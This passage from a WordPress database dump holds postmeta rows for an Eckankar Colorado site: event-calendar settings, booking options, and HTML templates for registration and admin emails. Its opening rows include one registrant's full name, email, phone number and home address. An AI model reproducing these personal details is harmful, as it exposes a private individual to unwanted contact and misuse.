you!'),(163241,266756,'_field_37','US'),(163240,266756,'_field_36','CO'),(163238,266756,'_field_34','6940 E GIRARD AVE APT 407'),(163239,266756,'_field_35','Denver'),(163237,266756,'_field_33','ginnybrook@hotmail.com'),(163236,266756,'_field_32','(303) 830-8872'),(163235,266756,'_field_31','Brookhouser'),(163472,266764,'mec_end_time_ampm','AM'),(163471,266764,'mec_end_time_minutes','30'),(163470,266764,'mec_end_time_hour','10'),(163469,266764,'mec_end_date','2022-06-19'),(163468,266764,'mec_start_day_seconds','37800'),(163467,266764,'mec_start_time_ampm','AM'),(163466,266764,'mec_start_time_minutes','30'),(163465,266764,'mec_start_time_hour','10'),(163464,266764,'mec_start_date','2022-06-19'),(163463,266764,'mec_public','1'),(163462,266764,'mec_countdown_method','global'),(163461,266764,'mec_timezone','global'),(163460,266764,'mec_comment',''),(163459,266764,'mec_hide_end_time','0'),(163458,266764,'mec_hide_time','0'),(163455,266764,'mec_certain_weekdays','a:0:{}'),(163456,266764,'mec_allday','0'),(163457,266764,'one_occurrence','0'),(163484,266764,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:1:\"0\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(163483,266764,'mec_hourly_schedules','a:0:{}'),(163480,266764,'mec_advanced_days','a:0:{}'),(163481,266764,'mec_in_days',''),(163482,266764,'mec_not_in_days',''),(163479,266764,'mec_repeat_end_at_date',''),(163478,266764,'mec_repeat_end_at_occurrences',''),(163475,266764,'mec_repeat_type',''),(163476,266764,'mec_repeat_interval','1'),(163477,266764,'mec_repeat_end',''),(163474,266764,'mec_repeat_status','0'),(163473,266764,'mec_end_day_seconds','37800'),(163454,266764,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(163234,266756,'_field_30','Virginia (Ginny)'),(160847,264415,'sf_reset_button','0'),(160848,264415,'sf_refine','0'),(160849,264438,'sf_reset_button','0'),(160850,264438,'sf_refine','0'),(160851,264431,'sf_reset_button','0'),(160852,264431,'sf_refine','0'),(160853,266619,'mec_color',''),(160854,266619,'mec_location_id','144'),(160855,266619,'mec_dont_show_map','0'),(160856,266619,'mec_organizer_id','1'),(160857,266619,'mec_read_more',''),(160858,266619,'mec_more_info',''),(160859,266619,'mec_more_info_title',''),(160860,266619,'mec_more_info_target','_self'),(160861,266619,'mec_cost',''),(160862,266619,'mec_currency','a:0:{}'),(160863,266619,'mec_additional_organizer_ids','a:0:{}'),(160864,266619,'mec_additional_location_ids','a:0:{}'),(160865,266619,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-06-12\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-06-12\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.2\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"10/31/2022\";s:18:\"end_at_occurrences\";s:1:\"5\";}}'),(160866,266619,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.2\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"10/31/2022\";s:18:\"end_at_occurrences\";s:1:\"5\";}'),(160867,266619,'mec_certain_weekdays','a:0:{}'),(160868,266619,'mec_allday','0'),(160869,266619,'one_occurrence','0'),(160870,266619,'mec_hide_time','0'),(160871,266619,'mec_hide_end_time','0'),(160872,266619,'mec_comment',''),(160873,266619,'mec_timezone','global'),(160874,266619,'mec_countdown_method','global'),(160875,266619,'mec_public','1'),(160876,266619,'mec_start_date','2022-06-12'),(160877,266619,'mec_start_time_hour','7'),(160878,266619,'mec_start_time_minutes','0'),(160879,266619,'mec_start_time_ampm','PM'),(160880,266619,'mec_start_day_seconds','68400'),(160881,266619,'mec_end_date','2022-06-12'),(160882,266619,'mec_end_time_hour','8'),(160883,266619,'mec_end_time_minutes','0'),(160884,266619,'mec_end_time_ampm','PM'),(160885,266619,'mec_end_day_seconds','72000'),(160886,266619,'mec_repeat_status','1'),(160887,266619,'mec_repeat_type','advanced'),(160888,266619,'mec_repeat_interval','1'),(160889,266619,'mec_repeat_end','date'),(160890,266619,'mec_repeat_end_at_occurrences','4'),(160891,266619,'mec_repeat_end_at_date','2022-10-31'),(160892,266619,'mec_advanced_days','a:1:{i:0;s:5:\"Sun.2\";}'),(160893,266619,'mec_in_days',''),(160894,266619,'mec_not_in_days',''),(160895,266619,'mec_hourly_schedules','a:0:{}'),(160896,266619,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(160897,266619,'mec_tickets','a:0:{}'),(160964,266625,'protect_children',''),(160965,266625,'mec_color',''),(160966,266625,'mec_location_id','118'),(160967,266625,'mec_dont_show_map','0'),(160898,266619,'mec_fees_global_inheritance','1'),(160899,266619,'mec_fees','a:0:{}'),(160900,266619,'mec_ticket_variations_global_inheritance','1'),(160901,266619,'mec_ticket_variations','a:0:{}'),(160902,266619,'mec_reg_fields_global_inheritance','1'),(160903,266619,'mec_reg_fields','a:0:{}'),(160904,266619,'mec_bfixed_fields','a:0:{}'),(160905,266619,'mec_op','a:0:{}'),(160906,266619,'mec_fields','a:0:{}'),(160907,266619,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:5886:\"<p>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</p>\r\n<p>&nbsp;</p>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>XXXXXX<br />\r\n<b>Passcode:</b> XXXXX</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"#\">URL GOES HERE</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:31:\"Admin  - New Event Registration\";s:7:\"content\";s:10034:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(160908,266619,'mec_event_status','EventScheduled'),(160909,266619,'mec_moved_online_link',''),(160910,266619,'mec_cancelled_reason',''),(160911,266619,'mec_display_cancellation_reason_in_single_page',''),(160912,266619,'protect_children',''),(160913,266619,'passster_activate_global_protection',NULL),(160914,266619,'passster_activate_protection',NULL),(160915,266619,'passster_protection_type','password'),(160916,266619,'boldgrid_hide_page_title','0'),(160917,266619,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(160918,266619,'boldgrid_in_page_containers','1'),(160920,266619,'_dp_original','266543'),(160921,266619,'_edit_lock','1667529828:2'),(160922,266619,'_edit_last','2'),(160968,266625,'mec_organizer_id','1'),(160955,266624,'_wp_attached_file','2022/05/way-of-the-initiate-3.jpg'),(160956,266624,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:710;s:6:\"height\";i:386;s:4:\"file\";s:33:\"2022/05/way-of-the-initiate-3.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"way-of-the-initiate-3-300x163.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:163;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"way-of-the-initiate-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:33:\"way-of-the-initiate-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:33:\"way-of-the-initiate-3-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:33:\"way-of-the-initiate-3-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:33:\"way-of-the-initiate-3-300x386.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:386;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\"